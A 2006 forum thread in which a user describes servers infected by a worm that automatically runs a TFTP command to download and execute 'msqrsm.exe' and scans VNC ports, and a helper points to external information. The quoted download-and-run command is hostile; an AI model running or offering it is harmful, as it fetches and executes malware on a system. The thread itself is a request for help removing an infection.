tftp -i 0.0.0.0 GET msqrsm.exe

Discussion in 'malware problems & news' started by leiw, Sep 30, 2006.

Thread Status:
Not open for further replies.
  1. leiw

    leiw Registered Member

    Joined:
    Sep 30, 2006
    Posts:
    4
    Hi all, this is my first post,

    My company have 4 servers running 3 is windows 2000 and 1 is windows 2003, 4 day ago, when I using VNC remote to my company servers form my home, I saw all servers auto open cmd command in run, and in command auto type tftp -i 0.0.0.0 GET msqrsm.exe and then msqrsm.exe, checked the firwall log always had my server SRC address 192.168.0.3 to DEST address 192.168.x.x (x.x mean radom), SRC port is 22xx (xx mean radom), DEST port 5900, and 1 mins can sent many packet to random private IP....

    Any brother can tell me what type of Vrius Infected? and how to fix this problem ?


    Thanks !!!
    Wilson
     
  2. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Hello Wilson, welcome to Wilders,

    There is some info regarding msqrsm.exe here

    Edit,
    There is also some info at the "Avast web forum" concerning this,.. please read the last post on this page in particular
     
    Last edited: Sep 30, 2006
  3. leiw

    leiw Registered Member

    Joined:
    Sep 30, 2006
    Posts:
    4
    Thank you !!
     
  4. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Your welcome,
    Please do let us know how you go on.
     
Loading...
Thread Status:
Not open for further replies.